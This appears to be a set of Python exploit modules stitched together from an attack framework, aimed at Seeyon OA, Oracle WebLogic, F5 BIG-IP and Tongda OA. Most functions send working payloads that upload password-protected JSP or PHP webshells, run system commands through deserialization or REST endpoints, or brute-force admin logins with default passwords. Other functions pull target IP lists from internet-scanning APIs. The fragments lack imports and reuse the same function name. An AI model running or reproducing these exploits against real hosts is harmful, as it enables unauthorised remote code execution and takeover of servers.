def poc(url):
# url = "www.example.org/default.html?ct=32&op=92&item=98"
# --> http://www.example.org
if url[:4] != "http":
url = "http://" + url
o = urlparse(url)
url = o.scheme + "://" + o.netloc
headers = {
"User-Agent":get_random_ua()
}
# shell_name can modify it yourself
shell_name="config_db1.jsp"
shell_url = url + "/seeyon/" + shell_name
try:
# just prevent being attacked
res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
if res.status_code == 200 and ":-)" in res.text:
return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
except:
pass
shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
# def_shell content can modufy iy youself
def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
def_shell = def_shell.encode()
base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo="
payload_head_len = 283 + len(f_base64encode(shell_name))
payload_shell_len = len(def_shell)
payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
payload_shell_name = f_base64encode(shell_name)
payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
payload_shell_name), 'utf-8') + payload_shell
try:
request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
except:
return False
if ":-)" in res:
return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
else:
return False
def linux_check_2(url, webshell_path):
linux_payload_2 = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>"""
try:
attack_url = url + '/_async/AsyncResponseService'
request.post(url=attack_url,
data=linux_payload_2,
headers=post_headers,
timeout=5,
verify=False)
jsp_path = url + '/bea_wls_internal/webshell2.jsp'
time.sleep(1)
r = request.get(url=jsp_path,
headers=get_headers,
timeout=5,
verify=False)
if r.status_code == 200 and r.text == 'weblogic_2019_48814':
webshell_path.append("{}?pwd=123&cmd=whoami".format(jsp_path))
else:
pass
# print("第二种方式失败")
except Exception as e:
pass
def get_token(self):
# Please access https://www.zoomeye.org/api/doc#login
data = {
'username': self.username,
'password': self.password
}
data_encoded = json.dumps(data) # dumps 将 python 对象转换成 json 字符串
res = request.post('https://api.zoomeye.org/user/login', data=data_encoded)
if res and res.status_code == 200 and 'access_token' in res.text:
res_decoded = json.loads(res.text)
self.token = res_decoded['access_token']
return self.token
return False
def fast_check_1(url,attach_path):
url_path=url+'/admin/index/login.html'
passwd=["123456","admin","admin123","admin123456"]
for password in passwd:
post_data={
"username":"******",
"password":password
}
try:
req=request.post(url=url_path,data=post_data,headers=post_headers,timeout=5, verify=False)
if req.status_code==200 and "登录成功" in req.text:
attach_path.append(url_path+"---账号:admin"+"密码:"+password)
else:
pass
except Exception as e:
pass
def poc(url):
headers = {
"Content-Type":
"text/xml;charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/wls-wsat/CoordinatorPortType"
post_data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/sh</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>whoami</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
vulnurl = url + payload
try:
req = request.post(vulnurl,
data=post_data,
headers=headers,
timeout=10,
verify=False)
if req.status_code == 500 and r"java.lang.ProcessBuilder" in req.text:
return vulnurl
else:
return False
except:
return False
def poc(url):
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
target = get_standard_url(url)
for url_payload in (url_payload1, url_payload2, url_payload3,
url_payload4):
url = target + url_payload
for data_payload in (data_payload1, data_payload2, data_payload3):
try:
res = request.post(url,
data=data_payload,
headers=headers,
timeout=5,
allow_redirects=False)
if res.status_code == 200 and ";</script>" not in res.text\
and "Login.jsp" not in res.text and "Error" not in res.text:
return url + "\tpayload:" + data_payload
except:
pass
return False
def poc(url):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Content-Type":"application/x-www-form-urlencoded"
}
payload = "/console/j_security_check"
passwd = ["weblogic", "weblogic1", "weblogic12", "weblogic123"]
vulnurl = url + payload
for pwd in passwd:
post_data = {
"j_username":"******",
"j_password":pwd
}
try:
req = request.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False, allow_redirects=False)
if req.status_code == 302 and r"console" in req.text and r"LoginForm.jsp" not in req.text:
return vulnurl + json.dumps(post_data, indent=4)
else:
return False
except:
return False
def poc(url):
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
target = get_standard_url(url)
url = target + url_payload
for payload in (payload1, payload2):
try:
res = request.post(url,
data=payload,
headers=headers,
timeout=5,
allow_redirects=False)
if "系统提醒工作流" in res.text and "403" not in res.text:
if "@@version" in payload:
return target + "\tmssql"
else:
return target + "\toracle"
except:
pass
return False
def get_ip(query, page):
'''
Return ips and total amount when doing query
'''
data = {"query": query, "page": page, "fields": ["ip", "protocols"]}
try:
res = request.post(API_URL + "/search/ipv4",
data=json.dumps(data),
auth=(UID, SECRET))
results = res.json()
if res.status_code != 200:
colorprint.red("error occurred: %s" % results["error"])
sys.exit(1)
# add result in some specific form
for result in results["results"]:
conf.target.add(result["ip"])
except Exception as e:
colorprint.red(e)
def poc(url):
url = get_standard_url(url)
path = url + "/mgmt/tm/util/bash"
headers = {
'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0',
'Content-Type': 'application/json',
'X-F5-Auth-Token': '',
'Authorization': 'Basic YWRtaW46QVNhc1M='
}
data = json.dumps({'command': 'run', 'utilCmdArgs': '-c id'})
try:
r = request.post(url=path,
data=data,
headers=headers,
verify=False,
timeout=5)
if r.status_code == 200 and 'commandResult' in r.text:
return True
except Exception as e:
print(e)
return False
def poc(url):
try:
url1 = get_standard_url(url) + '/ispirit/im/upload.php'
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":
"gzip, deflate",
"X-Forwarded-For":
"127.0.0.1",
"Connection":
"close",
"Upgrade-Insecure-Requests":
"1",
"Content-Type":
"multipart/form-data; boundary=---------------------------27723940316706158781839860668"
}
data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
result = request.post(url1,
headers=headers,
data=data,
timeout=5,
verify=False)
name = "".join(re.findall("2003_(.+?)\|", result.text))
url2 = get_standard_url(url) + '/ispirit/interface/gateway.php'
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Forwarded-For": "127.0.0.1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"json":
"{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" %
(name),
"f":
"echo fffhhh"
}
result = request.post(url2,
headers=headers,
data=data,
timeout=5,
verify=False)
if result.status_code == 200 and 'fffhhh' in result.text:
# print("[+] Remote code execution vulnerability exists at the target address")
return get_standard_url(url)
else:
return False
except:
pass
